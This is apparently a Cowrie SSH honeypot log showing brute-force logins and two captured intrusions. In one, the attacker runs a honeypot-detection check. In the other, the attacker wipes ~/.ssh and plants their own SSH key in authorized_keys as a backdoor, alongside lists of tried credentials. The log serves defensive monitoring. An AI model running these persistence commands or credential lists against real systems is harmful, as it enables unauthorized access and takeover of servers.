{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T11:23:47.394912Z","src_ip":"212.227.235.229","session":"f66ab70577f5"}
{"eventid":"cowrie.login.failed","username":"admin","password":"k3s601","message":"login attempt [admin/k3s601] failed","sensor":"my-vps","timestamp":"2025-08-28T11:23:47.986777Z","src_ip":"212.227.235.229","session":"f66ab70577f5"}
{"eventid":"cowrie.login.failed","username":"admin","password":"net02net","message":"login attempt [admin/net02net] failed","sensor":"my-vps","timestamp":"2025-08-28T11:23:49.115296Z","src_ip":"212.227.235.229","session":"f66ab70577f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59366,"dst_ip":"1.2.3.4","dst_port":22,"session":"df9380c5b8ad","protocol":"ssh","message":"New connection: 212.227.125.160:59366 (1.2.3.4:22) [session: df9380c5b8ad]","sensor":"my-vps","timestamp":"2025-08-28T11:23:49.791371Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:23:49.792152Z","src_ip":"212.227.125.160","session":"df9380c5b8ad"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:23:49.975632Z","src_ip":"212.227.125.160","session":"df9380c5b8ad"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1212","message":"login attempt [admin/1212] failed","sensor":"my-vps","timestamp":"2025-08-28T11:23:50.245031Z","src_ip":"212.227.235.229","session":"f66ab70577f5"}
{"eventid":"cowrie.login.failed","username":"test","password":"password","message":"login attempt [test/password] failed","sensor":"my-vps","timestamp":"2025-08-28T11:23:50.527265Z","src_ip":"212.227.125.160","session":"df9380c5b8ad"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1q2w3e4r","message":"login attempt [admin/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-08-28T11:23:51.373709Z","src_ip":"212.227.235.229","session":"f66ab70577f5"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:23:52.003552Z","src_ip":"212.227.125.160","session":"df9380c5b8ad"}
{"eventid":"cowrie.login.failed","username":"admin","password":"51Dd7DRv5i2X","message":"login attempt [admin/51Dd7DRv5i2X] failed","sensor":"my-vps","timestamp":"2025-08-28T11:23:52.502609Z","src_ip":"212.227.235.229","session":"f66ab70577f5"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:23:53.630899Z","src_ip":"212.227.235.229","session":"f66ab70577f5"}
{"eventid":"cowrie.session.closed","duration":"301.2","message":"Connection lost after 301.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:24:04.052410Z","src_ip":"212.227.235.229","session":"11d4a38b9828"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40404,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f8eeb203a18","protocol":"ssh","message":"New connection: 212.227.125.160:40404 (1.2.3.4:22) [session: 8f8eeb203a18]","sensor":"my-vps","timestamp":"2025-08-28T11:24:33.232911Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:24:33.234111Z","src_ip":"212.227.125.160","session":"8f8eeb203a18"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:24:33.397350Z","src_ip":"212.227.125.160","session":"8f8eeb203a18"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456789","message":"login attempt [test/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T11:24:34.060002Z","src_ip":"212.227.125.160","session":"8f8eeb203a18"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:24:35.303161Z","src_ip":"212.227.125.160","session":"8f8eeb203a18"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49514,"dst_ip":"1.2.3.4","dst_port":22,"session":"10733df5d9ef","protocol":"ssh","message":"New connection: 217.72.205.35:49514 (1.2.3.4:22) [session: 10733df5d9ef]","sensor":"my-vps","timestamp":"2025-08-28T11:24:53.747890Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:24:53.748984Z","src_ip":"217.72.205.35","session":"10733df5d9ef"}
{"eventid":"cowrie.session.connect","src_ip":"31.214.172.54","src_port":54516,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb5be352e462","protocol":"ssh","message":"New connection: 31.214.172.54:54516 (1.2.3.4:22) [session: eb5be352e462]","sensor":"my-vps","timestamp":"2025-08-28T11:25:19.365716Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:25:19.568368Z","src_ip":"31.214.172.54","session":"eb5be352e462"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T11:25:19.569149Z","src_ip":"31.214.172.54","session":"eb5be352e462"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53542,"dst_ip":"1.2.3.4","dst_port":22,"session":"896daac4b5cd","protocol":"ssh","message":"New connection: 212.227.125.160:53542 (1.2.3.4:22) [session: 896daac4b5cd]","sensor":"my-vps","timestamp":"2025-08-28T11:25:20.523549Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:25:20.524198Z","src_ip":"212.227.125.160","session":"896daac4b5cd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:25:20.694628Z","src_ip":"212.227.125.160","session":"896daac4b5cd"}
{"eventid":"cowrie.login.success","username":"root","password":"ADmin123","message":"login attempt [root/ADmin123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:25:20.819000Z","src_ip":"31.214.172.54","session":"eb5be352e462"}
{"eventid":"cowrie.login.failed","username":"test","password":"12345","message":"login attempt [test/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T11:25:21.215973Z","src_ip":"212.227.125.160","session":"896daac4b5cd"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:25:22.561433Z","src_ip":"212.227.125.160","session":"896daac4b5cd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:25:35.052083Z","src_ip":"31.214.172.54","session":"eb5be352e462"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-28T11:25:35.052866Z","src_ip":"31.214.172.54","session":"eb5be352e462"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:25:35.053590Z","src_ip":"31.214.172.54","session":"eb5be352e462"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T11:25:35.055979Z","src_ip":"31.214.172.54","session":"eb5be352e462"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:25:35.056751Z","src_ip":"31.214.172.54","session":"eb5be352e462"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T11:25:35.058121Z","src_ip":"31.214.172.54","session":"eb5be352e462"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T11:25:35.059265Z","src_ip":"31.214.172.54","session":"eb5be352e462"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T11:25:35.059951Z","src_ip":"31.214.172.54","session":"eb5be352e462"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-28T11:25:35.060772Z","src_ip":"31.214.172.54","session":"eb5be352e462"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-28T11:25:35.062147Z","src_ip":"31.214.172.54","session":"eb5be352e462"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-28T11:25:35.063210Z","src_ip":"31.214.172.54","session":"eb5be352e462"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-28T11:25:35.344605Z","src_ip":"31.214.172.54","session":"eb5be352e462"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:25:35.345697Z","src_ip":"31.214.172.54","session":"eb5be352e462"}
{"eventid":"cowrie.session.closed","duration":"16.0","message":"Connection lost after 16.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:25:35.346808Z","src_ip":"31.214.172.54","session":"eb5be352e462"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49136,"dst_ip":"1.2.3.4","dst_port":22,"session":"57c00b7380ab","protocol":"ssh","message":"New connection: 212.227.235.229:49136 (1.2.3.4:22) [session: 57c00b7380ab]","sensor":"my-vps","timestamp":"2025-08-28T11:25:56.688293Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:25:56.689574Z","src_ip":"212.227.235.229","session":"57c00b7380ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54252,"dst_ip":"1.2.3.4","dst_port":22,"session":"28fcec76601e","protocol":"ssh","message":"New connection: 212.227.235.229:54252 (1.2.3.4:22) [session: 28fcec76601e]","sensor":"my-vps","timestamp":"2025-08-28T11:25:56.797256Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T11:25:56.798143Z","src_ip":"212.227.235.229","session":"28fcec76601e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:25:56.834008Z","src_ip":"212.227.235.229","session":"57c00b7380ab"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T11:25:56.926612Z","src_ip":"212.227.235.229","session":"28fcec76601e"}
{"eventid":"cowrie.login.success","username":"root","password":"200511","message":"login attempt [root/200511] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:25:57.456967Z","src_ip":"212.227.235.229","session":"57c00b7380ab"}
{"eventid":"cowrie.login.failed","username":"jim","password":"7777777","message":"login attempt [jim/7777777] failed","sensor":"my-vps","timestamp":"2025-08-28T11:25:57.518368Z","src_ip":"212.227.235.229","session":"28fcec76601e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:25:57.773804Z","src_ip":"212.227.235.229","session":"57c00b7380ab"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:25:57.774487Z","src_ip":"212.227.235.229","session":"57c00b7380ab"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:25:57.775411Z","src_ip":"212.227.235.229","session":"57c00b7380ab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:25:57.922063Z","src_ip":"212.227.235.229","session":"57c00b7380ab"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:25:58.269498Z","src_ip":"212.227.235.229","session":"57c00b7380ab"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:25:58.270365Z","src_ip":"212.227.235.229","session":"57c00b7380ab"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:25:58.418472Z","src_ip":"212.227.235.229","session":"57c00b7380ab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:25:58.419369Z","src_ip":"212.227.235.229","session":"57c00b7380ab"}
